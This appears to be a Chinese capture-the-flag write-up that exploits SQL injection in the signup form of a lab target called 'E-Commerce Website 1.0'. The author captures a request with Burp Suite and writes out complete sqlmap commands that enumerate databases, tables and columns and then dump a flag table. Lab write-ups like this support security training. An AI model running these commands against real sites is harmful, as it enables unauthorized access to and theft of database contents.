靶标介绍
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
攻克过程
1、打开靶机发现是这样的页面
2、根据靶标介绍中的几个关键字段,很显然,我们需要点击sign up进入注册页面
3、 随便填入信息后,使用burpsuite进行抓包,并将数据包内容保存为test.txt
4、接下来,我们就需要请出我们的老朋友sqlmap,但是因为这里有cookie和user-agent,所以我们在sqlmap中也需要设置,为了sqlmap能通过身份验证和客户端验证。 先爆出数据库名称
sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -dbs
5、接着爆出表的名称
sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -tables
6、爆出字段名称
sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -T flllaaaag -columns
7、最后爆出flag
sqlmap -r test.txt --user-agent='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0' --cookie='PHPSESSID=69e9250a3c7e7ce5325b4a8a2aad223a' --batch -D electricks -T flllaaaag -C flag -dump